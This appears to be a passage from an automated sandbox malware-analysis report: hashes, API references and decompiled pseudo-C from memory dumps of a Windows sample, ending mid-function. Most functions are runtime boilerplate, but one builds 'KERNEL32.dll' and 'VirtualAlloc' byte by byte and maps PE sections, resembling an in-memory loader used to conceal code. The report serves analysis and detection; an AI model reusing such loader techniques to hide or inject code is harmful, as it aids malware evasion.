Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: F
API String ID: 352835431-2857159536
Opcode ID: 0fdf792a8dbf3ef76d00b361eb834d0e93e90a8af3c6985fc279465cdd2f0fb4
Instruction ID: 35e26f69cad8784389b82d866ada14d1759a34fbd47d2f3d5bfdde2c89a22c03
Opcode Fuzzy Hash: 0fdf792a8dbf3ef76d00b361eb834d0e93e90a8af3c6985fc279465cdd2f0fb4
Instruction Fuzzy Hash: 8751AB71800248ABCF219F54DC44EEF7FB9FB48751F10412AFC04A2262D3398D58DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045DAF8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045DAF8(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x460a04,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0045FADD(1,  &_v280, 0x100,  &_v1304,  *0x460a04,  *0x460c24, 0);
						E0045F88E( *0x460c24, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x460a04, 0); // executed
						E0045F88E( *0x460c24, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x460a04, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x460a20) =  *(_t55 + 0x460a20) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x460b21) =  *(_t55 + 0x460b21) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x460a20) = _t77;
								goto L16;
							}
							 *(_t55 + 0x460b21) =  *(_t55 + 0x460b21) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x460a20) =  *(_t43 + 0x460a20) & 0x00000000;
						} else {
							 *(_t43 + 0x460b21) =  *(_t43 + 0x460b21) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x460b21) =  *(_t43 + 0x460b21) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x460a20) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x0045db15
0x0045db1b
0x0045db22
0x0045db22
0x0045db29
0x0045db2a
0x0045db2e
0x0045db31
0x0045db3a
0x0045db73
0x0045db92
0x0045dbb6
0x0045dbde
0x0045dbe6
0x0045dbe8
0x0045dbee
0x0045dbee
0x0045dbf4
0x0045dc0f
0x0045dc21
0x00000000
0x0045dc21
0x0045dc11
0x0045dc18
0x0045dc04
0x0045dc04
0x00000000
0x0045dc04
0x0045dbf6
0x0045dbfd
0x00000000
0x0045dc28
0x0045dc28
0x0045dc2a
0x0045dc2b
0x00000000
0x0045dbee
0x0045db3e
0x0045db41
0x0045db41
0x0045db44
0x0045db49
0x0045db4d
0x0045db54
0x0045db5c
0x0045db66
0x0045db66
0x0045db66
0x0045db69
0x0045db6a
0x0045db6d
0x00000000
0x0045db72
0x0045dc31
0x0045dc38
0x0045dc3b
0x0045dc59
0x0045dc6e
0x0045dc60
0x0045dc60
0x0045dc69
0x00000000
0x0045dc69
0x0045dc42
0x0045dc42
0x0045dc4b
0x0045dc4e
0x0045dc4e
0x0045dc4e
0x0045dc75
0x0045dc76
0x0045dc7c

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 0045DB0C

Strings

, xrefs: 0045DB31
, xrefs: 0045DB55

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 69de5b47aadb92f9f508bab88a8ed90dda89733b40a769759e6c80d08f1e8234
Instruction ID: 0876d90852c3602ac0a29efc31e4673bd44d66622a0d054ccb3ed39e8ffa3651
Opcode Fuzzy Hash: 69de5b47aadb92f9f508bab88a8ed90dda89733b40a769759e6c80d08f1e8234
Instruction Fuzzy Hash: 8F4169318042981AEB368794CD4AFFB3FA99F16745F1804E6D986C7153D2B9490CC7AF

Uniqueness

Uniqueness Score: -1.00%

Function 101B6570, Relevance: 4.7, APIs: 3, Instructions: 210memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,101B0FF9), ref: 101B66D8
VirtualProtect.KERNEL32(10000000,00001000,00000004,?,00000000), ref: 101B6737
VirtualProtect.KERNEL32(10000000,00001000), ref: 101B674C

Memory Dump Source

Source File: 00000001.00000002.247753542.00000000101B1000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.247533870.0000000010000000.00000004.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual$AddressProc
String ID:
API String ID: 56755673-0
Opcode ID: e70ed22fcc7f816a5d9e92902a9e2f9466efce20e33b3c74072ad967c9c29417
Instruction ID: 69a53be012b80e534ef243508a209408d594c500d388e49af03a80f8ff4b6d54
Opcode Fuzzy Hash: e70ed22fcc7f816a5d9e92902a9e2f9466efce20e33b3c74072ad967c9c29417
Instruction Fuzzy Hash: 75512972A543524BD7108EB8CDD065177B4EB693A4B2A0F78C5E1C73C9EBAC5C16C760

Uniqueness

Uniqueness Score: -1.00%

Function 0045BF74, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0045BF74(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				void* __ebx;
				intOrPtr _t62;
				signed int _t64;
				long _t65;
				void* _t68;
				void* _t70;
				void* _t79;
				void* _t80;
				signed int* _t81;
				signed int _t84;
				signed int _t85;
				signed int _t90;
				signed int _t91;
				void* _t98;
				long _t106;
				void* _t107;
				signed int* _t110;
				void* _t112;
				void* _t113;
				void* _t114;

				_v36 = _v36 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push( &_v32);
				_push( &_v48);
				_push(0);
				_v48 = 0x4b;
				_v47 = 0x45;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v44 = 0x45;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v32 = 0x56;
				_v31 = 0x69;
				_v30 = 0x72;
				_v29 = 0x74;
				_v28 = 0x75;
				_v27 = 0x61;
				_v26 = 0x6c;
				_v25 = 0x41;
				_v24 = 0x6c;
				_v23 = 0x6c;
				_v22 = 0x6f;
				_v21 = 0x63;
				_t62 = E0045BAB0( &_v48, _t79, __ecx, __edx);
				_t110 = _a12;
				_v16 = _t62;
				_t114 = _t113 + 0xc;
				_v8 = 0;
				_v12 = _t110[1];
				_t64 =  *_t110;
				_t80 = ( *(_t64 + 0x14) & 0x0000ffff) + _t64 + 0x18;
				if( *((intOrPtr*)(_t64 + 6)) <= 0) {
					L7:
					return _t64;
				}
				_t81 = _t80 + 0x10;
				do {
					_t65 =  *_t81;
					if(_t65 != 0) {
						_t68 = VirtualAlloc( *((intOrPtr*)(_t81 - 4)) + _v12, _t65, 0x1000, 4);
						_t84 =  *_t81;
						_t112 = _t81[1] + _a4;
						_t85 = _t84 >> 2;
						memcpy(_t68, _t112, _t85 << 2);
						_t70 = memcpy(_t112 + _t85 + _t85, _t112, _t84 & 0x00000003);
						_t114 = _t114 + 0x18;
						_t110 = _a12;
						 *(_t81 - 8) = _t70;
					} else {
						_t106 =  *(_a8 + 0x38);
						if(_t106 > 0) {
							_t98 = VirtualAlloc( *((intOrPtr*)(_t81 - 4)) + _v12, _t106, 0x1000, 4);
							_t90 = _t106;
							 *(_t81 - 8) = _t98;
							_t107 = _t98;
							_t91 = _t90 >> 2;
							memset(_t107 + _t91, memset(_t107, 0, _t91 << 2), (_t90 & 0x00000003) << 0);
							_t114 = _t114 + 0x18;
						}
					}
					_v8 = _v8 + 1;
					_t81 =  &(_t81[0xa]);
					_t64 =  *( *_t110 + 6) & 0x0000ffff;
				} while (_v8 < _t64);
				goto L7;
			}

0x0045bf7b
0x0045bf7f
0x0045bf88
0x0045bf8e
0x0045bf8f
0x0045bf90
0x0045bf94
0x0045bf98
0x0045bf9c
0x0045bfa0
0x0045bfa4
0x0045bfa8
0x0045bfac
0x0045bfb0
0x0045bfb4
0x0045bfb8
0x0045bfbc
0x0045bfc0
0x0045bfc4
0x0045bfc8
0x0045bfcc
0x0045bfd0
0x0045bfd4
0x0045bfd8
0x0045bfdc
0x0045bfe0
0x0045bfe4
0x0045bfe8
0x0045bfec
0x0045bff0
0x0045bff5
0x0045bff8
0x0045bffb
0x0045bffe
0x0045c004
0x0045c007
0x0045c011
0x0045c015
0x0045c0a0
0x0045c0a0
0x0045c0a0
0x0045c01b
0x0045c01e
0x0045c01e
0x0045c022
0x0045c06a
0x0045c06d
0x0045c072
0x0045c079
0x0045c07c
0x0045c083
0x0045c083
0x0045c085
0x0045c088
0x0045c024
0x0045c027
0x0045c02c
0x0045c040
0x0045c042
0x0045c044
0x0045c047
0x0045c04d
0x0045c057
0x0045c057
0x0045c057
0x0045c02c
0x0045c08d
0x0045c090
0x0045c093
0x0045c097
0x00000000

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 0045C03D
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 0045C06A

Strings

Main, xrefs: 0045BF74

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAllocProcVirtual$HandleModule
String ID: Main
API String ID: 2267228844-521822810
Opcode ID: cee62c2c2e02034db9a7d3d6f0dd992017c7a7937f367cdb5946251bef5349b9
Instruction ID: 03b62afb07a4c919e2b5a817bf778c64180b78aaff5c588aeeabfdf7c33ac801
Opcode Fuzzy Hash: cee62c2c2e02034db9a7d3d6f0dd992017c7a7937f367cdb5946251bef5349b9
Instruction Fuzzy Hash: 1B416271D04288DFDB01CBA8C844BDEBFF59F55704F084099D985AB382C2BA5A48C779

Uniqueness

Uniqueness Score: -1.00%

Function 0045C2A7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 151libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?), ref: 0045C3B7

Strings

Main, xrefs: 0045C2A7

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$LibraryLoad
String ID: Main
API String ID: 652391981-521822810
Opcode ID: 887ac467eb959279b67e7f1ac55f925f09e39beaa80884ea0b091b0adadd2156
Instruction ID: 4c0b1b4a5ee7a171aba18442f4929378021884909cb168b755187609daf839b2
Opcode Fuzzy Hash: 887ac467eb959279b67e7f1ac55f925f09e39beaa80884ea0b091b0adadd2156
Instruction Fuzzy Hash: 31616771D04389DEEB11CBA8C884BEEBFB59F16309F184059D94467383D3BD9948C769

Uniqueness

Uniqueness Score: -1.00%

Function 0045C0A1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0045C207

Strings

Main, xrefs: 0045C0A1

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$ProtectVirtual
String ID: Main
API String ID: 2080333215-521822810
Opcode ID: be09265672eb639aabd4b649aec86dd7eae804ef470becd1e19f6645127e6a01
Instruction ID: 7eb39d379d8dda8edb999b5c720ddd1c7283f5280955887a184358df73ad0430
Opcode Fuzzy Hash: be09265672eb639aabd4b649aec86dd7eae804ef470becd1e19f6645127e6a01
Instruction Fuzzy Hash: 22512E70D082C8EEDB11CBA8D5887DEBFB56F16309F184099E5847B293C3BA5A09C775

Uniqueness

Uniqueness Score: -1.00%

Function 0045D408, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D408(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x460c28 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E0045D2C0(_t12, _t15);
					 *0x460c2c = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0045F0E0();
							goto L5;
						}
					} else {
						_t10 = E0045E88F(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x460c28);
							goto L7;
						}
					}
				}
			}

0x0045d408
0x0045d419
0x0045d41f
0x0045d421
0x0045d426
0x0045d45e
0x0045d460
0x0045d428
0x0045d428
0x0045d430
0x0045d435
0x0045d444
0x0045d447
0x00000000
0x0045d449
0x0045d449
0x00000000
0x0045d449
0x0045d437
0x0045d43c
0x0045d44e
0x0045d450
0x0045d461
0x0045d463
0x0045d464
0x0045d452
0x0045d458
0x00000000
0x0045d458
0x0045d450
0x0045d435

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0045C7EE,00000001), ref: 0045D419

Part of subcall function 0045D2C0: GetVersionExA.KERNEL32 ref: 0045D2DF

HeapDestroy.KERNEL32 ref: 0045D458

Part of subcall function 0045E88F: HeapAlloc.KERNEL32(00000000,00000140,0045D441,000003F8), ref: 0045E89C

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 500fa4b79c5aa03b79c95304531ca3db68015c8272760933812e88df128f1e66
Instruction ID: e1b9a8abd10e8304148c4a043e4ac180e090accbc4195e0a94eec1e10f6fb794
Opcode Fuzzy Hash: 500fa4b79c5aa03b79c95304531ca3db68015c8272760933812e88df128f1e66
Instruction Fuzzy Hash: 70F03971A05201AAEF342B315D45B2A25909F45797F10883BFD01D96A3FBB895C8DA1F

Uniqueness

Uniqueness Score: -1.00%

Function 0045D8A5, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045D8A5(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0045D7ED(0x19);
				_t50 = E0045DA52(_a4);
				_t85 = _t50 -  *0x460a04; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E0045DACF(); // executed
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x458d80;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x458e70;
							if(_t36 < 0x458e70) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x460850;
									if( *0x460850 == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x460c24 =  *0x460c24 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x460b20, 0, _t60 << 2);
									asm("stosb");
									 *0x460a04 = _t50;
									if(__eflags <= 0) {
										 *0x460a1c =  *0x460a1c & 0x00000000;
										__eflags =  *0x460a1c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x460b21) =  *(_t49 + 0x460b21) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x460b21) =  *(_t47 + 0x460b21) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x460c24 = E0045DA9C(_t50);
										 *0x460a1c = _t81;
									}
									_t71 = 0x460a10;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E0045DAF8(_t50, _t71); // executed
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x460b20, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t16 = _t79 + 0x458d90; // 0x458d90
						_t51 = _t16;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t17 =  &(_t57[1]); // 0xdf
									_t66 =  *_t17;
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x458d78; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x460b21) =  *(_t41 + 0x460b21) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						 *0x460a1c = 1;
						 *0x460a04 = _a4;
						_t40 = E0045DA9C(_a4);
						_t71 = 0x460a10;
						asm("movsd");
						asm("movsd");
						 *0x460c24 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0045D84E(0x19);
				return _t77;
			}

0x0045d8b0
0x0045d8bd
0x0045d8c0
0x0045d8c7
0x0045d8ca
0x0045d8d3
0x0045d8d5
0x0045da31
0x0045da31
0x0045d8db
0x0045d8db
0x0045d8db
0x0045d8dd
0x0045d8e2
0x0045d8e2
0x0045d8e4
0x00000000
0x00000000
0x0045d8e6
0x0045d8e9
0x0045d8ea
0x0045d8ef
0x00000000
0x0045d8f1
0x0045d8f6
0x0045d8fe
0x0045d8ff
0x0045d901
0x0045da28
0x0045da2f
0x0045da40
0x0045da40
0x00000000
0x00000000
0x00000000
0x0045d907
0x0045d909
0x0045d910
0x0045d918
0x0045d91b
0x0045d91d
0x0045d91e
0x0045d924
0x0045da15
0x0045da15
0x0045d92a
0x0045d92a
0x0045d92e
0x0045d934
0x0045d937
0x0045d937
0x0045d939
0x0045d93b
0x00000000
0x00000000
0x0045d941
0x0045d945
0x0045d948
0x0045d948
0x0045d94a
0x00000000
0x00000000
0x0045d950
0x0045d957
0x0045d957
0x0045d9e5
0x0045d9e6
0x0045d9ea
0x00000000
0x00000000
0x00000000
0x0045d9ea
0x0045d937
0x0045d9f0
0x0045d9f0
0x0045d9f2
0x0045d9f2
0x0045d9f9
0x0045d9fa
0x0045d9fa
0x0045da08
0x0045da0d
0x0045da0d
0x0045da1e
0x0045da23
0x0045da24
0x0045da25
0x0045da36
0x0045da36
0x00000000
0x0045da36
0x0045d901
0x00000000
0x0045d8ef
0x0045d95a
0x0045d960
0x0045d96b
0x0045d96d
0x0045d96d
0x0045d970
0x0045d971
0x0045d971
0x0045d977
0x0045d977
0x0045d97a
0x0045d97c
0x0045d97e
0x0045d97e
0x0045d97e
0x0045d981
0x0045d983
0x00000000
0x00000000
0x0045d985
0x0045d988
0x0045d98b
0x0045d98d
0x0045d992
0x0045d992
0x0045d998
0x0045d998
0x0045d99e
0x0045d99f
0x0045d99f
0x0045d998
0x0045d9a4
0x0045d9a5
0x0045d9a8
0x00000000
0x00000000
0x00000000
0x0045d9a8
0x0045d97e
0x0045d9aa
0x0045d9aa
0x0045d9ad
0x0045d9b0
0x0045d9b0
0x0045d9b9
0x0045d9c4
0x0045d9c9
0x0045d9d4
0x0045d9d9
0x0045d9da
0x0045d9dc
0x0045d9e1
0x0045d9e1
0x00000000
0x0045d8cc
0x0045d8cc
0x0045d8cc
0x0045d8cc
0x0045da43
0x0045da45
0x0045da51

APIs

Part of subcall function 0045D7ED: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D82A
Part of subcall function 0045D7ED: EnterCriticalSection.KERNEL32(?,?,?,0045E42B,00000009,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045D845

GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,0045C830), ref: 0045D8F6

Part of subcall function 0045D84E: LeaveCriticalSection.KERNEL32(?,0045DF8B,00000009,0045DF77,00000000,?,00000000,00000000,00000000), ref: 0045D85B

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterInfoInitializeLeave
String ID:
API String ID: 1866836854-0
Opcode ID: eb2656c45f6c3bfa49c9f2d7b47c7306d7e397fb6cc8c4ec2bc330f36a8f71c5
Instruction ID: 9846068ad56f13fed990f12ca494b4931f647655f78b90f14723235582d7d189
Opcode Fuzzy Hash: eb2656c45f6c3bfa49c9f2d7b47c7306d7e397fb6cc8c4ec2bc330f36a8f71c5
Instruction Fuzzy Hash: 044176B1D082905BEB31DBB4D84036B7BE19F4830AF28447BE985D6293D6BD4C4D874E

Uniqueness

Uniqueness Score: -1.00%

Function 0045DEBE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0045DEBE(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x45b8b0);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x460c2c; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x45ae94; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0045D7ED(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E0045F3D8(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0045DF84();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x460a00; // 0x0
